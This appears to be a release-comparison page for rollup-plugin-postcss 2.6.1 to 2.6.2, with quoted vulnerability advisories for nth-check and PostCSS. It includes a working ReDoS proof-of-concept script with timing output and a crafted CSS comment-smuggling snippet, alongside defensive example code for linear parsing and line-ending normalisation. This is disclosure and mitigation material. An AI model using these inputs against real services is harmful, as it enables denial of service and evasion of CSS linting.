rollup-plugin-postcss, a plugin for integrating PostCSS with Rollup, received a patch release from version 2.6.1 to 2.6.2 in April 2020. The core functionality is unchanged, but developers tracking the package may want to know what moved in this release. Both versions declare identical dependencies, including cssnano for CSS optimization, postcss for CSS transformation, and rollup-pluginutils for Rollup integration. The development dependencies also match, with jest, eslint-config-rem and xo for testing and linting, plus Babel presets for compatibility.
The primary difference lies in the dist object: unpackedSize decreased slightly, from 37943 bytes in 2.6.1 to 37905 bytes in 2.6.2, while fileCount is unchanged, which points to a small edit inside the packaged files rather than a file being added or removed. Since the two releases were published a day apart, the change is most likely a bug fix or a small optimization. A patch release is not expected to introduce new features or breaking changes, but a size delta alone does not say what changed, so developers upgrading should read the project's changelog or the commits between the two tags, confirm that the release actually fixes the bug they are hitting, and run their build to make sure nothing regresses before rolling it out.
Vulnerabilities reported against version 2.6.2 of the package (both are in its dependency tree: nth-check and postcss)
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS in the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency: two adjacent \s* quantifiers can both consume the same run of whitespace, so when the overall match fails the engine retries every way of splitting that run between them, and the work grows super-linearly with the length of the whitespace. It can be exploited with the following code.
Proof of Concept
// PoC.js
// Needs a vulnerable nth-check release installed (the advisory is fixed in 2.0.1);
// run with: node PoC.js
const nthCheck = require("nth-check");

// Each iteration builds "2n", a long run of whitespace, then "!" so the regex
// cannot match and has to backtrack across the two adjacent \s* quantifiers.
// The loop bound is deliberately huge; stop it (Ctrl-C) once the growth is visible.
for (let i = 1; i <= 50000; i++) {
  const time = Date.now();
  const attack_str = "2n" + " ".repeat(i * 10000) + "!";
  try {
    nthCheck.parse(attack_str);
  } catch (err) {
    // parse() rejects the string, but only after the super-linear backtracking
    const time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
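To see why the quoted sub-pattern backtracks and what a fix looks like, here is an added example (my own code, not nth-check's): a regex-based parser built around the \s*(?:([+-]?)\s*(\d+))? sub-pattern from the advisory, a hand-written linear-time parser for the same an+b grammar, and a timing harness on the PoC's attack string at small sizes. The leading ([+-]?\d*n)? group and the even/odd handling are assumptions used to complete the grammar; the attack strings are constructed the same way as in the PoC above.

```javascript
// Added example: vulnerable regex parse vs linear-time parse of "an+b".
// Assumption: the leading ([+-]?\d*n)? group completes the grammar; only the
// \s*(?:([+-]?)\s*(\d+))? sub-pattern is taken from the advisory text.
const VULNERABLE_RE = /^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$/;

// Regex-based parser: on "2n   ...   !" the first \s* eats all the spaces,
// the optional group fails on "!", and the engine retries every split of the
// whitespace run between the two adjacent \s* quantifiers (quadratic work).
function parseNthRegex(formula) {
  const s = formula.trim().toLowerCase();
  if (s === 'even') return [2, 0];
  if (s === 'odd') return [2, 1];
  const m = VULNERABLE_RE.exec(s);
  if (!m || (m[1] === undefined && m[3] === undefined)) {
    throw new Error(`n-th rule couldn't be parsed ('${formula}')`);
  }
  let a = 0;
  if (m[1] !== undefined) {
    const coef = m[1].slice(0, -1);            // drop the trailing "n"
    a = coef === '' || coef === '+' ? 1 : coef === '-' ? -1 : parseInt(coef, 10);
  }
  const b = m[3] !== undefined ? parseInt(m[2] + m[3], 10) : 0;
  return [a, b];
}

// Linear-time parser: a single left-to-right pass with no backtracking, so the
// cost is proportional to the input length whatever whitespace it contains.
function parseNthLinear(formula) {
  const s = formula.trim().toLowerCase();
  if (s === 'even') return [2, 0];
  if (s === 'odd') return [2, 1];
  let i = 0;
  const readSign = () => {
    if (s[i] === '+') { i++; return 1; }
    if (s[i] === '-') { i++; return -1; }
    return 1;
  };
  const readNumber = () => {
    const start = i;
    while (i < s.length && s[i] >= '0' && s[i] <= '9') i++;
    return i > start ? parseInt(s.slice(start, i), 10) : null;
  };
  const skipWhitespace = () => { while (i < s.length && /\s/.test(s[i])) i++; };

  let a = 0;
  let sign = readSign();
  let number = readNumber();
  if (s[i] === 'n') {
    i++;
    a = sign * (number === null ? 1 : number);
    skipWhitespace();
    if (i < s.length) {           // a "+b" / "-b" tail follows
      sign = readSign();
      skipWhitespace();
      number = readNumber();
    } else {                      // bare "an"
      sign = 0;
      number = 0;
    }
  }
  if (number === null || i < s.length) {
    throw new Error(`n-th rule couldn't be parsed ('${formula}')`);
  }
  return [a, sign * number];
}

// Constructed attack input, built the same way as the PoC above.
function attackString(spaces) {
  return '2n' + ' '.repeat(spaces) + '!';
}

// Wall-clock cost of one parse attempt; rejection of the attack input is expected.
function timeMs(fn) {
  const start = process.hrtime.bigint();
  try { fn(); } catch (err) { /* expected: the input is invalid */ }
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Small sizes keep the demo quick; the regex column grows roughly 4x per doubling.
for (const spaces of [1000, 2000, 4000]) {
  const input = attackString(spaces);
  const regexMs = timeMs(() => parseNthRegex(input)).toFixed(2);
  const linearMs = timeMs(() => parseNthLinear(input)).toFixed(2);
  console.log(`${input.length} chars: regex ${regexMs} ms, linear ${linearMs} ms`);
}
```

Both parsers accept the same valid inputs and reject the same invalid ones; the difference is only in how long rejection takes. The structural fix is the second shape: consume whitespace exactly once at each position so there is never a choice to backtrack over. Absolute timings depend on the machine, which is why the comparison is shown as growth across sizes rather than as fixed numbers.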
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment. The practical risk is that a linter checking the PostCSS node tree and a browser consuming the same stylesheet disagree about where a comment begins and ends, so the linter's verdict does not describe what the browser will actually apply.
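The advisory gives the trigger but not what a linting pipeline should do about it. The following added example (my own code, not PostCSS's tokenizer, which it does not reproduce) shows the browser-side reading of a constructed stylesheet built around the @font-face{ font:(\r/*);} snippet: a minimal comment scanner following the CSS Syntax rule that /* outside a string opens a comment that runs to the next */, plus the CSS Syntax preprocessing step (CR, FF and CRLF become LF) that removes the bare \r before the text reaches any parser. The sample stylesheet, including the rules placed inside and after the comment, is constructed for the example.

```javascript
// Added example: model the browser-side view of CSS containing a bare "\r"
// and normalise line endings before handing untrusted CSS to a parser.
// Constructed sample built around the advisory's @font-face{ font:(\r/*);} snippet.
const SAMPLE = '@font-face{ font:(\r/*);}\nbody{color:red}\n*/ a{color:blue}';

// CSS Syntax Level 3 preprocessing: CR, FF and CRLF become LF, NUL becomes
// U+FFFD (surrogate replacement is omitted here). Apply before parsing so a
// tokenizer that treats "\r" differently from "\n" never sees a bare CR.
function preprocessCss(css) {
  return css.replace(/\r\n|\r|\f/g, '\n').replace(/\u0000/g, '\uFFFD');
}

// Minimal comment scanner: "/*" outside a string opens a comment that runs to
// the next "*/" (or to end of input if unterminated). Strings are skipped so
// "/*" inside quotes is not a comment. Simplified: unescaped newlines inside
// strings are not treated as bad-string tokens as the spec would.
function commentSpans(css) {
  const spans = [];
  let i = 0;
  while (i < css.length) {
    const ch = css[i];
    if (ch === '"' || ch === "'") {
      i++;
      while (i < css.length && css[i] !== ch) {
        if (css[i] === '\\') i++;          // backslash escapes the next char
        i++;
      }
      i++;                                 // closing quote
    } else if (ch === '/' && css[i + 1] === '*') {
      const close = css.indexOf('*/', i + 2);
      const end = close === -1 ? css.length : close + 2;
      spans.push([i, end]);
      i = end;
    } else {
      i++;
    }
  }
  return spans;
}

// What remains once a browser has discarded the comments.
function stripComments(css) {
  let out = '';
  let last = 0;
  for (const [start, end] of commentSpans(css)) {
    out += css.slice(last, start);
    last = end;
  }
  return out + css.slice(last);
}

// True when the stylesheet contains a CR that is not part of a CRLF pair,
// which is the shape of input the advisory describes.
function hasBareCarriageReturn(css) {
  return /\r(?!\n)/.test(css);
}

console.log('bare CR present:', hasBareCarriageReturn(SAMPLE));
console.log('comment spans:', JSON.stringify(commentSpans(SAMPLE)));
console.log('browser-side view:', JSON.stringify(stripComments(SAMPLE)));
console.log('after preprocessing:', JSON.stringify(preprocessCss(SAMPLE)));
```

In the browser-side view the body{color:red} rule sits inside the comment and is never applied, while a tokenizer that does not treat the bare \r as a line break can place the comment boundary elsewhere and report that rule as an ordinary node; the mismatch between what the linter examined and what the browser applies is the advisory's point. Upgrading PostCSS to 8.4.31 or later is the fix on the parser side; running preprocessCss over untrusted input first (or rejecting input where hasBareCarriageReturn is true, if the pipeline can afford to) keeps the two readings aligned regardless of the parser version.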